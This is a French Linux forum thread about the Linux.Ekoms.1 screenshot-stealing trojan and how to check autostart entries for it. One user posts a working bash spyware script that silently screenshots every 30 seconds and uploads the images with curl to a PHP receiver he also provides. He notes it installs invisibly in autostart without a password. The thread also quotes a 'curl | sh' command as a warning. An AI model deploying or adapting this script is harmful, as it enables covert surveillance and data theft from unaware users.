souriez vous êtes filmé [Linux.Ekoms.1]

[papajoke]

et oui ça existe les virus sous Linux desktop

en voici un qui fait/envoie des copies écran toutes les 30 secondes

source (fr), détails

cat $HOME/.config/autostart/* | grep -i exec ras que mes services, et non pas chez moi suis pas photogénique

[lemust83]

Recommandations pour le traitement

Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Rien que ça comme solution!!! Télécharger DrWeb pour Linux. Comme pour toutes les sa ries sous W$.
Là , j'ai quand même un doute. Ce genre de script devrait être aisément détectable sans passer par un truc en ligne...

[papajoke]

oui mais c'est eux qui l'on découvert (pas d'arrière pensée )
c'est donc normal que sur leur site web, ils proposent d'utiliser l'antivirus qu'il vendent ...

a noter que l'on parle d'un cheval de troie, et donc pas d'un trou de sécurité Linux.

[nam1962]

Tiens, j'en ai déjà croisé sur les forums ubuntu des chevals de trait.

...la principale soluce est de mettre un scotch sur la fente du lecteur de floppy.

Comme çà ils ne peuvent plus se nourrir et du coup ils partent vite sur des ordis W$ !

[pascaldanel]

Tiens, j'en ai déjà croisé sur les forums ubuntu des chevals de trait.

???

[lemust83]

Donc là, qu' en pense-tu ?

 cat $HOME/.config/autostart/* | grep -i exec
Exec=/usr/bin/cairo-dock -o
Exec=/usr/bin/plank
Exec=/usr/bin/thunderbird
Exec=puseaudio --start
TryExec=xfce4-clipman
Exec=xfce4-clipman

Cairo, plank et dock ne sont plus actifs mais faudra que je pense a les virer, puseaudio --start est un essai de script avec faute d'orthographe volontaire pour ne pas influencer les vrais fichiers .
Le reste peut être éventuellement intéressant pour des pirates

[papajoke]

puisque tu les connais tous , il n'y a pas de problème
il faudra juste se poser des questions lorsque nous aurons :

Exec=NomdeprogrammeInconnu

A noter que l'on ne sait pas comment il arrive ce "dada troyen", par mail ? dans aur ? ... et sa diffusion est peut-être très très limitée...

[alkiros]

En lançant ta commande papajoke je n'ai eu comme réponse que "yakuake", ce qui m'a bien surpris car il n'est pas installé, comment m'en débarrasser?

[papajoke]

mais tu l'as installé une fois .... et lorsque l'on supprime un paquet, les fichiers dans le dossier utilisateur restent car ils ne font pas partie du paquet.

pour toi supprime le fichier dans ~/.config/autostart/ (yakuake.desktop?)

moins grave, il peut aussi parfois en rester des traces (un fichier ou dossier) dans

~/.config/
~/.local/share/

[alkiros]

papajoke, et merci c'est tout bon!

[nam1962]

Tiens, j'en ai déjà croisé sur les forums ubuntu des chevals de trait.

???

..Il faut se méfier du danger des chevaux de trait qui risquent d'écraser les ordi....

..Comme des sites anti-virus qui ne trouvent qu'une faille que personne d'autre ne signale

[papajoke]

..Comme des sites anti-virus qui ne trouvent qu'une faille que personne d'autre ne signale

c'est pas une faille mais un logiciel espion; et ok pour l'instant il est très très discret au point de se demander si il existe ...

pour la petite histoire, ca existe sous win, un exemple réel :
un en particulier pour le poker : il est discrètement installé dans un logiciel payant de poker cracké( ); il retourne des copies écran ainsi, le méchant te retrouve facilement sur les tables et va jouer gagnant a tous les coups contre toi puisqu'il voit tes cartes

----------------------
puisqu'il n'existe pas sous linux , je me suis amusé à l'écrire
script cp-ecran :

#!/usr/bin/env bash
if [[ -z "$(command -V scrot)" ]]; then
    exit 1
fi

DESTINATION='http://127.0.0.1:8000'
DIR=$(mktemp -d)
count=1

postimg() {
    local img="$1"
    curl -s -F "file=@${img}" "${DESTINATION}/post.php" &>/dev/null && rm "${img}" 
    #echo "clic ${count} !"
}

main() {
    while true; do 
        local img="${DIR}/tmp.jpeg"
        command -p scrot -q 20 -zu "${img}" && postimg "${img}"
        ((count+=1))
        sleep 30 ; 
        (( count > 20 )) && break # fin au bout de 20 copies car test !
    done
    [[ -n "${DIR}" && -d "${DIR}" ]] && rm -rf "${DIR}"    
    #echo "Vous n'êtes plus filmé ;)"
}
# pour test lancer le serveur web avant dans une autre console
#php -S 127.0.0.1:8000 -t /home/patrick/workspace/bash/cp-ecran/www/ 2>/dev/null
main &

ici, les copies écran sont envoyées à un serveur web (127.0.0.1:8000), en particulier la page post.php :

<?php
    $dest=__DIR__.'/'.$_SERVER['REMOTE_ADDR'].'/';
    if (! file_exists("$dest")) mkdir("$dest", 0775);
    $name= getdate()[0].'.jpg';
    move_uploaded_file($_FILES['file']['tmp_name'], $dest.$name);
?>

il ne reste plus qu'a avoir sont propre serveur php web, et y copier le fichier post.php; pour test on peut s'en faire un sur notre propre machine (si php est installé) :

php -S 127.0.0.1:8000 -t $HOME/www/

et voila, après installation dans $HOME/.config/autostart/ (pas de droits élevés!), j'espionne ma propre machine (ou surveille une classe de cours) et retrouve les copies écran dans mon $HOME/www/adresse_Ip_du_client/



ps: il faut de pré installé : scrot

[nam1962]

Tu as raison de me corriger, logiciel espion.
Bon, personne ne l'a vu (ça doit être un super espion )

Joli script sinon.

Mais il faut quand même l'installer !

[papajoke]

Mais il faut quand même l'installer !

installé dans $HOME !!! donc c'est relativement facile : pas de mot de passe demandé, l'installation peut-être complètement invisible !

Attention, sous Linux, comme sous windows, il est relativement facile d'envoyer un "virus" par email, tu peux voir cette discution

de plus le virus peut très bien venir de aur ou d'un "méchant" proxy entre tes dépôts et ta machine ou d'une commande très très dangereuse récupérée sur le web du genre : curl -sS http://siteweb/check | sh et je ne parle pas des failles

@nam1962
je viens de voir ton dernier fil sur ton forum, si les ransomware existent aussi sous linux Linux.Encoder.1 (faille Magento), découvert par la même société ..

[nam1962]

...tu parles de quel forum ? de http://dolys.fr ?